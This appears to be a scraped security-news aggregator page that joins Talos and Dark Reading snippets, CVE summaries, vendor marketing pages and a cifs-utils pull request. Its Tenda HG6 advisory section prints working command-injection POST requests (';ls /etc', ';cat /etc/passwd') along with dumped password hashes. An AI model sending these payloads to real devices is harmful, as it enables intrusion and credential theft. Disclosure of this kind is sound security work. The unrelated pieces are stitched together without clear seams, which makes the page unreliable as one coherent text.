Today, Talos is publishing a glimpse into the most prevalent threats we've observed between April 29 and May 6. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics,...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

Threat Roundup for April 29 to May 6

Microsoft's stand-alone version of Defender for SMBs promises to help SecOps teams automate detection, response, and recovery.

Microsoft has released a stand-alone version of Defender for Business for small-to-midsize businesses (SMBs), which the company says will provide endpoint security on par with that of a large enterprise. 

A Microsoft survey found that 70% of SMBs are worried about the business risk that cybersecurity poses, and while 80% of SMBs said they have antivirus protection, 93%  still have concerns about cybersecurity threats. 

Microsoft said Defender for Business can help automate the protection, detection, and response tasks that can bog down SecOps 

"Automated investigation and remediation are a huge part of the product," Adam Atwell, cloud solutions architect at consulting firm Kite Technology Group, said in a statement. "It's just happening in the background. Defender for Business makes our security so simple."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Microsoft Releases Defender for SMBs

There is a command injection vulnerability at the /goform/setsambacfg interface of Tenda AC15 US_AC15V1.0BR_V15.03.05.20_multi_TDE01.bin device web, which can also cooperate with CVE-2021-44971 to cause unconditional arbitrary command execution

\---
title: TendaAC15\_vul
date: 2022-03-31 17:31:30
tags:CVE
---

**TendaAC15\_Vul****Vender**

Tenda

Official website ：https://www.tendacn.com/

link:：https://www.tendacn.com/download/detail-3851.html

name：US\_AC15V1.0BR\_V15.03.05.20\_multi\_TDE01.bin

**Vulnerability1****Detail**

​ The stack overflow vulnerability lies in the /goform/setpptpservercfg interface of the web. The sent post data startip and endip are copied to the stack using the sanf function, resulting in stack overflow. Similarly, this vulnerability can be used together with CVE-2021-44971

​ 

​ Therefore, adding a string of useless characters after straip and endip in the sent postData can cause the web end to crash

**Vulnerability2****Detail**

​ There is command injection at the /goform/setsambacfg interface of Tenda ac15 device web, which can also cooperate with CVE-2021-44971 to cause unconditional arbitrary command execution

​ Similarly, the packet that triggers this vulnerability is very simple

CVE-2022-28557: TendaAC15_vul/TendaAC15-vul.md at main · doudoudedi/TendaAC15_vul

In nopCommerce 4.50.1, an open redirect vulnerability can be triggered by luring a user to authenticate to a nopCommerce page by clicking on a crafted link.

**12 years of experience**

On the eCommerce market

**60,000+ live shops**

From SMB to Enterprise  
10,000+ new stores every year

**150+ partners**

From 40+ countries

**1,500+ integrations**

Plugins, themes, language packs

**250,000+ members**

Community worldwide

**3,000,000+ downloads**

And the number is still growing

**For every size and type of business**

**Small and medium business**

Quickly launch and scale your online store with rich built-in functionality: integration with payment and shipment services; warehouse managing; marketing and SEO tools; and mobile-friendly stores.

**Enterprise business**

Use multi-vendor and multi-store functionality (B2B and B2C). Get the maximum advantage of enterprise-grade performance. Easy integration and limitless customization opportunities.

**Global business**

A flexible system to fit your demands: GDPR; multi-currencies and multi-languages; regional taxes and laws support; management of multiple international stores; integration with local services and suppliers.

**Why nopCommerce**

**Absolutely free**

No transaction fee.  
No monthly fees.  
No hidden fees.

**PCI DSS compliant**

Meet all security requirements for all kinds of businesses

**Unlimited customization**

You’re not limited by our built-in functionality because we’re open-source

**Great Support**

Our team and our community is always here to help you

**Testimonials**

If you are a .NET developer looking for an eCommerce platform you should consider nopCommerce. It is both a great extensible eCommerce platform and supports the latest versions of .NET

Scott Hunter,  
Director of Program Management for the .NET Platform at Microsoft (USA)

nopCommerce is a fantastic open-source, stable, and super extensible eCommerce platform based on cross-platform .NET Core! It's perfect for any size business.

Scott Hanselman,  
Principal Community Architect, Microsoft (USA)

Besides having a rich out-of-the-box functionality, the platform is also flexible in terms of additional customization and gives an opportunity to integrate with different corporate systems, which made it a perfect fit for us.

Boris Kulaev,  
Head of eCommerce Harman RUS CIS

Read case study

With nopCommerce we are able to create the optimal eCommerce system according to our customer’s needs. The modern and sophisticated backend of nopCommerce allows fast and simple configuration of the shop.

José Lopez,  
CEO of JMC Software AG (Switzerland)

Play case study

We like nopCommerce because it’s a platform with a very well-structured architecture that enables its modification greatly since it’s open-source. nopCommerce can be easily adapted to cover the needs of every one of our customers.

Eduardo Adame,  
General Director of Tecnofin (Mexico)

Play case study

As a platform, nopCommerce supports us very well because the architecture is very good. We needed a secure, Microsoft-compatible solution for a customer that was multi-store capable and nopCommerce fitted this description best.

Tobias Derucki,  
Managing Partner at Innovapps (Germany)

View the testimonial

I would recommend nopCommerce because it has an easy-to-use interface and you don’t have to be an IT-master to use it. You can be a marketing professional, create the content, manage the pricing and categories, and do it very easy.

Dana Koman,  
Marketing Manager of TACO Metals (USA)

View the testimonial

**Our clients**

*   
*   
*   
*   
*   
*   
*   
*   

**Integrated with all services**

**Create a successful store with nopCommerce!**

CVE-2022-27461: Free and open-source eCommerce platform. ASP.NET based shopping cart.

Tenda HG6 version 3.3.0 suffers from a remote command injection vulnerability. It can be exploited to inject and execute arbitrary shell commands through the pingAddr and traceAddr HTTP POST parameters in formPing, formPing6, formTracert and formTracert6 interfaces.

  
Tenda HG6 v3.3.0 Remote Command Injection Vulnerability

Vendor: Tenda Technology Co.,Ltd.  
Product web page: https://www.tendacn.com  
                  https://www.tendacn.com/product/HG6.html  
Affected version: Firmware version: 3.3.0-210926  
                  Software version: v1.1.0  
                  Hardware Version: v1.0  
                  Check Version: TD_HG6_XPON_TDE_ISP

Summary: HG6 is an intelligent routing passive optical network  
terminal in Tenda FTTH solution. HG6 provides 4 LAN ports(1*GE,3*FE),  
a voice port to meet users' requirements for enjoying the Internet,  
HD IPTV and VoIP multi-service applications.

Desc: The application suffers from an authenticated OS command injection  
vulnerability. This can be exploited to inject and execute arbitrary  
shell commands through the 'pingAddr' and 'traceAddr' HTTP POST parameters  
in formPing, formPing6, formTracert and formTracert6 interfaces.

Tested on: Boa/0.93.15

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2022-5706  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5706.php

22.04.2022

--

ping.asp:  
---------

POST /boaform/formPing HTTP/1.1  
Host: 192.168.1.1

pingAddr=;ls /etc&wanif=65535&submit-url=/ping.asp&postSecurityFlag=2564

---  
TZ  
app.gwdt  
bftpd.conf  
buildtime  
check_version.txt  
config  
config.csv  
config_default.xml  
config_default_hs.xml  
dhclient-script  
dnsmasq.conf  
ethertypes  
factory_default.xml  
ftpdpassword  
group  
hardversion  
inetd.conf  
init.d  
inittab  
innversion  
insdrv.sh  
irf  
mdev.conf  
omci_custom_opt.conf  
omci_ignore_mib_tbl.conf  
omci_ignore_mib_tbl_10g.conf  
omci_mib.cfg  
orf  
passwd  
ppp  
profile  
protocols  
radvd.conf  
ramfs.img  
rc_boot_dsp  
rc_voip  
release_date  
resolv.conf  
rtk_tr142.sh  
run_customized_sdk.sh  
runoam.sh  
runomci.sh  
runsdk.sh  
samba  
scripts  
services  
setprmt_reject  
shells  
simplecfgservice.xml  
smb.conf  
softversion  
solar.conf  
solar.conf.in  
ssl_cert.pem  
ssl_key.pem  
version  
wscd.conf

ping6.asp:  
----------

POST /boaform/formPing6 HTTP/1.1  
Host: 192.168.1.1

pingAddr=;ls&wanif=65535&go=Go&submit-url=/ping6.asp

---  
boa.conf  
web

tracert.asp:  
------------

POST /boaform/formTracert HTTP/1.1  
Host: 192.168.1.1

traceAddr=;pwd&trys=1&timeout=5&datasize=38&dscp=0&maxhop=10&go=Go&submit-url=/tracert.asp

---  
/home/httpd

tracert6.asp:  
-------------

POST /boaform/formTracert6 HTTP/1.1  
Host: 192.168.1.1

traceAddr=;cat /etc/passwd&trys=1&timeout=5&datasize=38&maxhop=10&go=Go&submit-url=/tracert6.asp

---  
admin:$1$$CoERg7ynjYLsj2j4glJ34.:0:0::/tmp:/bin/sh  
adsl:$1$$m9g7v7tSyWPyjvelclu6D1:0:0::/tmp:/bin/sh  
nobody:x:0:0::/tmp:/dev/null  
user:$1$$ex9cQFo.PV11eSLXJFZuj.:1:0::/tmp:/bin/sh

Tenda HG6 3.3.0 Remote Command Injection

QNAP and Synology say flaws in the Netatalk fileserver allow remote code execution and information disclosure.

Network attached storage (NAS) device vendors QNAP and Synology this week disclosed multiple critical vulnerabilities in an open source fileserver technology integrated into their products.

The vulnerabilities — several of which enable remote code execution (RCE) — exist in Netatalk, an open source version of Apple File Protocol fileserver for accessing network shares in multiple operating system environments. Both vendors are still working on updating all versions of their products that contain the vulnerability.

**Unpatched for Months**  
Security researchers working in coordination with the Zero Day Initiative (ZDI) reported a total of six vulnerabilities to the maintainers of Netatalk in December. Three of them are critical RCE bugs tied to buffer-overflow issues (CVE-2022-0194; CVE-2022-23122; CVE-2022-23125). Two of the flaws are medium-severity out-of-bounds information-disclosure vulnerabilities (CVE-2022-23124; CVE-2022-23123), and one is a critical RCE issue tied to improper handling of exceptional conditions (CVE-2022-23121).

Brian Gorenc, senior director of vulnerability research and head of ZDI at Trend Micro, tells Dark Reading that all the Netatalk bugs were first discovered at Pwn2Own Austin in November 2021.

Another flaw, a high-severity buffer-overflow related RCE (CVE-2021-31439), was disclosed to Netatalk's maintainers all the way back in March 2021.

The development team at Netatalk released an updated version of the software (Netatalk 3.1.13) on March 23 that addressed all seven of the vulnerabilities. The updated version is available for all currently supported operating systems: FreeBSD, Linux, OpenBSD, NetBSD, and Solaris and derivates.

However, it's a longer timeline for some vendors to roll the patches into their products. ZDI's Gorenc says that because Netatalk is a third-party component used by many NAS vendors, the vendors are responsible for monitoring for releases of Netatalk and integrating these releases into their products. "We are glad to see the NAS vendors updating their Netatalk deployments to resolve the vulnerabilities that were disclosed and fixed at Pwn2Own Austin," he says.

Western Digital is another vendor whose products were impacted by the flaws in Netatalk. But unlike Synology and QNAP, Western Digital proactively removed Netatalk from its products on Jan. 10, 2022, citing concerns over multiple critical vulnerabilities in the technology.

"Because Netatalk is unmaintained, we have removed Netatalk from our firmware released on January 10, 2022," the company announced in March. "Users can continue to access local network shares and perform Time Machine backup via SMB."

**Affected Devices**  
Synology's advisory described the vulnerabilities as critical and allowing remote attackers to steal sensitive data. Bad actors could potentially execute arbitrary code on NAS devices via a vulnerable version of its DiskStation Manager (DSM) and Synology Router Manager (SRM) technologies.

QNAP identified multiple versions of its QTS operating system as being vulnerable and said it is currently investigating the flaws. The company said that it's working on releasing updates to all impacted products, and it urged customers to install the updates as soon as they become available.

The Taiwan-based NAS manufacturer also outlined steps that organizations can take to mitigate the risk posed by the vulnerabilities while it works on fixes. QNAP's advisory identified CVE-2021-31439 — the flaw from last March — as one of the issues that it still needs to address in its products even though it was disclosed more than one year ago.

Both Synology and QNAP did not immediately respond to requests for comment from Dark Reading.

Critical Vulnerabilities Leave Some Network-Attached Storage Devices Open to Attack

NAS device vendors are dealing with several severe vulnerabilities in Netatalk, the open-source implemenation of AFP.
The post QNAP customers urged to disable AFP to protect against severe vulnerabilities appeared first on Malwarebytes Labs.

MacOS users that have a network-attached storage (NAS) device made by QNAP are being advised to disable the Apple Filing Protocol (AFP) on their devices until some severe vulnerabilities have been fixed. But QNAP is not the only vendor that needed to fix these vulnerabilities. Others have already done so, or have taken more drastic measures.

Taiwanese corporation QNAP has asked customers to disable the AFP file service protocol on its NAS appliances while it creates fixes for multiple, critical Netatalk vulnerabilities.

The vulnerabilities most urgently in need of mitigation or a fix are: CVE-2022-0194, CVE-2022-23121, CVE-2022-23122 and CVE-2022-23125. All of them are remote code execution (RCE) vulnerabilities, and all of them have a CVSS severity score of 9.8 out of 10.

In a security advisory, QNAP says it has fixed the Netatalk vulnerabilities for QTS 4.5.4.2012 build 20220419 and later, but it is still working to release security updates for all affected QNAP operating system versions. Given the severity of the vulnerabilities, keep an eye for updates.

**AFP and Netatalk**

A NAS device is a storage server connected to a computer network, storing data that can be accessed by a wide variety of devices, including Windows, macOS, and other systems. In real life this usually means they are used as an external hard-drive that can be accessed over an intranet or the Internet.

AFP is a proprietary network protocol, and part of the Apple File Service (AFS), that offers file services for macOS and the classic Mac OS. Many types of NAS devices support AFP so that macOS systems can access the data on them.

Netatalk is a free, open-source implementation of AFP that allows the Unix-like operating systems (that frequently power NAS devices) to serve as a file server for macOS systems.

Version 3.0 of Netatalk was released in July 2012. On  22nd of March 2022 the Netatalk team at Sourceforge announced Netatalk 3.1.13 with a new feature and several security updates.

**Not just QNAP**

Given the popularity of Netatalk, QNAP isn’t the only vendor that needs to deal with these vulnerabilities.

Another popular NAS device vendor, Synology, had issued Disk Station Manager version 7.1 to deal with the vulnerabilities. The update is expected to be available in all regions shortly but you can download it from the company’s website now if you want.

Western Digital removed Netatalk from its firmware, released on January 10, 2022. The company says that users can continue to access local network shares and perform Time Machine backups via SMB, a different file-sharing protocol.

TrueNAS says it fixed the vulnerabilities in TrueNAS Core 12.0-U8.1 on April 14, 2022.

**Mitigation**

Until an update has been made available, QNAP advises uses of affected devices to disable AFP and install security updates as soon as they become available.

To disable AFP on your QTS or QuTS hero NAS device, you will have to go to **Control Panel** > **Network & File Services** > **Win/Mac/NFS/WebDAV** > **Apple Networking** and select **Disable AFP (Apple Filing Protocol)**.

Stay safe, everyone!

QNAP customers urged to disable AFP to protect against severe vulnerabilities

cifs-utils through 6.14, with verbose logging, can cause an information leak when a file contains = (equal sign) characters but is not a valid credentials file.

**Conversation**

 

Previous check was true whatever the length of the input string was,
leading to a buffer overflow in the subsequent strcpy call.

Bug: https://bugzilla.samba.org/show\_bug.cgi?id=15025

Signed-off-by: Jeffrey Bencteux <jbe@improsec.com>
Reviewed-by: David Disseldorp <ddiss@suse.de>

 

When verbose logging is enabled, invalid credentials file lines may be
dumped to stderr. This may lead to information disclosure in particular
conditions when the credentials file given is sensitive and contains '='
signs.

Bug: https://bugzilla.samba.org/show\_bug.cgi?id=15026

Signed-off-by: Jeffrey Bencteux <jbe@improsec.com>
Reviewed-by: David Disseldorp <ddiss@suse.de>

mweinelt added a commit to mweinelt/nixpkgs that referenced this issue

Apr 28, 2022

github-actions bot pushed a commit to NixOS/nixpkgs that referenced this issue

Apr 29, 2022

 

gador pushed a commit to gador/nixpkgs that referenced this issue

May 3, 2022

CVE-2022-29869: mount.cifs: two bug fixes by ddiss · Pull Request #7 · piastry/cifs-utils

Linksys MR9600 devices before 2.0.5 allow attackers to read arbitrary files via a symbolic link to the root directory of a NAS SMB share.

**Merkmale**

**Die Zukunft beginnt mit der Intelligent Mesh™-Technologie und WiFi 6 jetzt schon.**

Der Linksys MR9600 ist ein extrem leistungsstarker Dual-Band WiFi 6 Router – perfekt für all diejenigen, die sich echte Gigabit-Geschwindigkeiten, eine höhere Reichweite und überall zu Hause genug Power zum Gamen wünschen. Mit Linksys Intelligent Mesh™-Technologie und Datenübertragungsraten von 6 Gbit/s ist er 4x schneller als WiFi 5 Router, verhindert Funklöcher und isoliert Ihr Netzwerk, um Störungen zu vermeiden. Mit diesem zukunftssicheren Router können Sie Ihr Netzwerk bei Bedarf erweitern, indem Sie Produkte hinzufügen, die mit dem Mesh-System von Linksys kompatibel sind. Mit der Linksys App lässt sich der MR9600 mühelos einrichten, sodass Sie in wenigen Minuten 8K-Videos streamen können.

**Mehr Kapazität für mehr Geräte**

WiFi 6 sendet und empfängt mehrere Datenströme gleichzeitig und sorgt für eine 4-mal höhere WLAN-Kapazität, um jedem Mobil-, Streaming-, Gaming- und Smart-Home-Gerät in Ihrem Netzwerk gerecht zu werden.

**Keine Funklöcher mehr**

Intelligent Mesh™-Technologie sorgt in Kombination mit WiFi 6 überall bei Ihnen Zuhause für WLAN-Geschwindigkeiten im Gigabit-Bereich – auch im Garten und auf Smart-Home-Geräten im Außenbereich.

**EINFACHE EINRICHTUNG UND BEDIENUNG**

Über die Linksys App erfolgt das Setup im Nu und Sie können von überall aus einfach auf Ihr Netzwerk zugreifen. Es ist zudem möglich, einzustellen, welche verbundenen Geräte die höchste Bandbreite im WLAN erhalten.

**Verringert WLAN-Überlastung**

Verhindert mithilfe der technisch ausgereiften WiFi 6-Technologie, die Ihr Netzwerk isolieren, Überlastung reduzieren und für das stärkste, klarste WLAN-Signal sorgen kann, Störungen durch benachbarte Netzwerke.

**Smartere Sicherheitsfunktionen**

Ihr Netzwerk ist dank der automatischen Software-Updates, Kinderschutzfunktionen und separatem Gastzugriff immer sicher und auf dem neuesten Stand.

**100 % abwärtskompatibel**

Funktioniert mit allen vorhandenen WLAN-fähigen Geräten wie Tablets, Laptops, Smart-Home- und Streaming-Geräten.

**Linksys App**

**Jederzeit und von überall aus haben Sie Ihr WLAN zu Hause voll im Griff**

Die Linksys App bietet Ihnen über Ihr Smartphone oder Tablet Remote-Zugriff auf Ihr WLAN zu Hause, sodass Sie es immer kontrollieren und verwalten können.

*   **Gastzugriff:** Richten Sie ein separates, passwortgeschütztes WLAN-Netzwerk für bis zu 50 Gäste ein und teilen Sie ihnen das Passwort bequem mit.
*   **Kinderschutzfunktionen:** Sorgen Sie für einen geschützten Internetzugang Ihrer Kinder, auch wenn Sie nicht vor Ort sind. Beschränken Sie den Zugang zu unangemessenen Inhalten oder Websites, die ablenken könnten, kontrollieren Sie die Nutzung und blockieren Sie den Internetzugang bestimmter Geräte.
*   **Gerätepriorisierung:** Geben Sie den Geräten, die die höchste Geschwindigkeit benötigen, den Vorrang.
*   **Geschwindigkeitstest:** Die Geschwindigkeit Ihrer Internetverbindung lässt sich einfach überprüfen und kontrollieren.

**Schnelles und einfaches Setup**

Die Verwaltung Ihres WLANs zu Hause erfolgt mit der Linksys App schnell und einfach:

 

****Laden Sie die Linksys App herunter****

 

 

****Stellen Sie eine Verbindung mit Ihrem Modem her****

 

****Geben Sie Ihrem WLAN einen Namen und erstellen Sie ein Passwort****

CVE-2022-24372: Linksys Dual-Band Mesh-WLAN WiFi 6 Router (MR9600)

In cifs-utils through 6.14, a stack-based buffer overflow when parsing the mount.cifs ip= command-line argument could lead to local attackers gaining root privileges.

Tag

#samba